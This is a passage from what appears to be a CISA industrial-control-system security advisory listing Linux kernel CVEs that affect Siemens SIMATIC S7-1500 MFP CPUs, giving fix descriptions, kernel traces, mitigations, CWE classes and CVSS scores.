<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/120.html">CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21795</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: NFSD: fix hang in nfsd4_shutdown_callback If nfs4_client is in courtesy state then there is no point to send the callback. This causes nfsd4_shutdown_callback to hang since cl_cb_inflight is not 0. This hang lasts about 15 minutes until TCP notifies NFSD that the connection was dropped. This patch modifies nfsd4_run_cb_work to skip the RPC call if nfs4_client is in courtesy state.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21795">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21796</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nfsd: clear acl_access/acl_default after releasing them If getting acl_default fails, acl_access and acl_default will be released simultaneously. However, acl_access will still retain a pointer pointing to the released posix_acl, which will trigger a WARNING in nfs3svc_release_getacl like this: ------------[ cut here ]------------ refcount_t: underflow; use-after-free. WARNING: CPU: 26 PID: 3199 at lib/refcount.c:28 refcount_warn_saturate+0xb5/0x170 Modules linked in: CPU: 26 UID: 0 PID: 3199 Comm: nfsd Not tainted 6.12.0-rc6-00079-g04ae226af01f-dirty #8 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014 RIP: 0010:refcount_warn_saturate+0xb5/0x170 Code: cc cc 0f b6 1d b3 20 a5 03 80 fb 01 0f 87 65 48 d8 00 83 e3 01 75 e4 48 c7 c7 c0 3b 9b 85 c6 05 97 20 a5 03 01 e8 fb 3e 30 ff &lt;0f&gt; 0b eb cd 0f b6 1d 8a3 RSP: 0018:ffffc90008637cd8 EFLAGS: 00010282 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff83904fde RDX: dffffc0000000000 RSI: 0000000000000008 RDI: ffff88871ed36380 RBP: ffff888158beeb40 R08: 0000000000000001 R09: fffff520010c6f56 R10: ffffc90008637ab7 R11: 0000000000000001 R12: 0000000000000001 R13: ffff888140e77400 R14: ffff888140e77408 R15: ffffffff858b42c0 FS: 0000000000000000(0000) GS:ffff88871ed00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000562384d32158 CR3: 000000055cc6a000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: ? refcount_warn_saturate+0xb5/0x170 ? __warn+0xa5/0x140 ? refcount_warn_saturate+0xb5/0x170 ? report_bug+0x1b1/0x1e0 ? handle_bug+0x53/0xa0 ? exc_invalid_op+0x17/0x40 ? asm_exc_invalid_op+0x1a/0x20 ? tick_nohz_tick_stopped+0x1e/0x40 ? refcount_warn_saturate+0xb5/0x170 ? refcount_warn_saturate+0xb5/0x170 nfs3svc_release_getacl+0xc9/0xe0 svc_process_common+0x5db/0xb60 ? __pfx_svc_process_common+0x10/0x10 ? __rcu_read_unlock+0x69/0xa0 ? __pfx_nfsd_dispatch+0x10/0x10 ? svc_xprt_received+0xa1/0x120 ? xdr_init_decode+0x11d/0x190 svc_process+0x2a7/0x330 svc_handle_xprt+0x69d/0x940 svc_recv+0x180/0x2d0 nfsd+0x168/0x200 ? __pfx_nfsd+0x10/0x10 kthread+0x1a2/0x1e0 ? kthread+0xf4/0x1e0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x34/0x60 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 Kernel panic - not syncing: kernel: panic_on_warn set ... Clear acl_access/acl_default after posix_acl_release is called to prevent UAF from being triggered.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21796">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21802</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix oops when unload drivers paralleling When unload hclge driver, it tries to disable sriov first for each ae_dev node from hnae3_ae_dev_list. If user unloads hns3 driver at the time, because it removes all the ae_dev nodes, and it may cause oops. But we can't simply use hnae3_common_lock for this. Because in the process flow of pci_disable_sriov(), it will trigger the remove flow of VF, which will also take hnae3_common_lock. To fixes it, introduce a new mutex to protect the unload process.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21802">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/413.html">CWE-413 Improper Resource Locking</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21814</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ptp: Ensure info-&gt;enable callback is always set The ioctl and sysfs handlers unconditionally call the -&gt;enable callback. Not all drivers implement that callback, leading to NULL dereferences. Example of affected drivers: ptp_s390.c, ptp_vclock.c and ptp_mock.c. Instead use a dummy callback if no better was specified by the driver.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21814">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21846</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: acct: perform last write from workqueue In [1] it was reported that the acct(2) system call can be used to trigger NULL deref in cases where it is set to write to a file that triggers an internal lookup. This can e.g., happen when pointing acc(2) to /sys/power/resume. At the point the where the write to this file happens the calling task has already exited and called exit_fs(). A lookup will thus trigger a NULL-deref when accessing current-&gt;fs. Reorganize the code so that the the final write happens from the workqueue but with the caller's credentials. This preserves the (strange) permission model and has almost no regression risk. This api should stop to exist though.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21846">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21853</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf: avoid holding freeze_mutex during mmap operation We use map-&gt;freeze_mutex to prevent races between map_freeze() and memory mapping BPF map contents with writable permissions. The way we naively do this means we'll hold freeze_mutex for entire duration of all the mm and VMA manipulations, which is completely unnecessary. This can potentially also lead to deadlocks, as reported by syzbot in [0]. So, instead, hold freeze_mutex only during writeability checks, bump (proactively) "write active" count for the map, unlock the mutex and proceed with mmap logic. And only if something went wrong during mmap logic, then undo that "write active" counter increment. [0] https://lore.kernel.org/bpf/678dcbc9.050a0220.303755.0066.GAE@google.com/</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21853">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21861</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mm/migrate_device: don't add folio to be freed to LRU in migrate_device_finalize() If migration succeeded, we called folio_migrate_flags()-&gt;mem_cgroup_migrate() to migrate the memcg from the old to the new folio. This will set memcg_data of the old folio to 0. Similarly, if migration failed, memcg_data of the dst folio is left unset. If we call folio_putback_lru() on such folios (memcg_data == 0), we will add the folio to be freed to the LRU, making memcg code unhappy. Running the hmm selftests: # ./hmm-tests ... # RUN hmm.hmm_device_private.migrate ... [ 102.078007][T14893] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x7ff27d200 pfn:0x13cc00 [ 102.079974][T14893] anon flags: 0x17ff00000020018(uptodate|dirty|swapbacked|node=0|zone=2|lastcpupid=0x7ff) [ 102.082037][T14893] raw: 017ff00000020018 dead000000000100 dead000000000122 ffff8881353896c9 [ 102.083687][T14893] raw: 00000007ff27d200 0000000000000000 00000001ffffffff 0000000000000000 [ 102.085331][T14893] page dumped because: VM_WARN_ON_ONCE_FOLIO(!memcg &amp;&amp; !mem_cgroup_disabled()) [ 102.087230][T14893] ------------[ cut here ]------------ [ 102.088279][T14893] WARNING: CPU: 0 PID: 14893 at ./include/linux/memcontrol.h:726 folio_lruvec_lock_irqsave+0x10e/0x170 [ 102.090478][T14893] Modules linked in: [ 102.091244][T14893] CPU: 0 UID: 0 PID: 14893 Comm: hmm-tests Not tainted 6.13.0-09623-g6c216bc522fd #151 [ 102.093089][T14893] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014 [ 102.094848][T14893] RIP: 0010:folio_lruvec_lock_irqsave+0x10e/0x170 [ 102.096104][T14893] Code: ... [ 102.099908][T14893] RSP: 0018:ffffc900236c37b0 EFLAGS: 00010293 [ 102.101152][T14893] RAX: 0000000000000000 RBX: ffffea0004f30000 RCX: ffffffff8183f426 [ 102.102684][T14893] RDX: ffff8881063cb880 RSI: ffffffff81b8117f RDI: ffff8881063cb880 [ 102.104227][T14893] RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000000 [ 102.105757][T14893] R10: 0000000000000001 R11: 0000000000000002 R12: ffffc900236c37d8 [ 102.107296][T14893] R13: ffff888277a2bcb0 R14: 000000000000001f R15: 0000000000000000 [ 102.108830][T14893] FS: 00007ff27dbdd740(0000) GS:ffff888277a00000(0000) knlGS:0000000000000000 [ 102.110643][T14893] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 102.111924][T14893] CR2: 00007ff27d400000 CR3: 000000010866e000 CR4: 0000000000750ef0 [ 102.113478][T14893] PKRU: 55555554 [ 102.114172][T14893] Call Trace: [ 102.114805][T14893] [ 102.115397][T14893] ? folio_lruvec_lock_irqsave+0x10e/0x170 [ 102.116547][T14893] ? __warn.cold+0x110/0x210 [ 102.117461][T14893] ? folio_lruvec_lock_irqsave+0x10e/0x170 [ 102.118667][T14893] ? report_bug+0x1b9/0x320 [ 102.119571][T14893] ? handle_bug+0x54/0x90 [ 102.120494][T14893] ? exc_invalid_op+0x17/0x50 [ 102.121433][T14893] ? asm_exc_invalid_op+0x1a/0x20 [ 102.122435][T14893] ? __wake_up_klogd.part.0+0x76/0xd0 [ 102.123506][T14893] ? dump_page+0x4f/0x60 [ 102.124352][T14893] ? folio_lruvec_lock_irqsave+0x10e/0x170 [ 102.125500][T14893] folio_batch_move_lru+0xd4/0x200 [ 102.126577][T14893] ? __pfx_lru_add+0x10/0x10 [ 102.127505][T14893] __folio_batch_add_and_move+0x391/0x720 [ 102.128633][T14893] ? __pfx_lru_add+0x10/0x10 [ 102.129550][T14893] folio_putback_lru+0x16/0x80 [ 102.130564][T14893] migrate_device_finalize+0x9b/0x530 [ 102.131640][T14893] dmirror_migrate_to_device.constprop.0+0x7c5/0xad0 [ 102.133047][T14893] dmirror_fops_unlocked_ioctl+0x89b/0xc80 Likely, nothing else goes wrong: putting the last folio reference will remove the folio from the LRU again. So besides memcg complaining, adding the folio to be freed to the LRU is just an unnecessary step. The new flow resembles what we have in migrate_folio_move(): add the dst to the lru, rem ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21861">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21864</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: tcp: drop secpath at the same time as we currently drop dst Xiumei reported hitting the WARN in xfrm6_tunnel_net_exit while running tests that boil down to: - create a pair of netns - run a basic TCP test over ipcomp6 - delete the pair of netns The xfrm_state found on spi_byaddr was not deleted at the time we delete the netns, because we still have a reference on it. This lingering reference comes from a secpath (which holds a ref on the xfrm_state), which is still attached to an skb. This skb is not leaked, it ends up on sk_receive_queue and then gets defer-free'd by skb_attempt_defer_free. The problem happens when we defer freeing an skb (push it on one CPU's defer_list), and don't flush that list before the netns is deleted. In that case, we still have a reference on the xfrm_state that we don't expect at this point. We already drop the skb's dst in the TCP receive path when it's no longer needed, so let's also drop the secpath. At this point, tcp_filter has already called into the LSM hooks that may require the secpath, so it should not be needed anymore. However, in some of those places, the MPTCP extension has just been attached to the skb, so we cannot simply drop all extensions.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21864">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
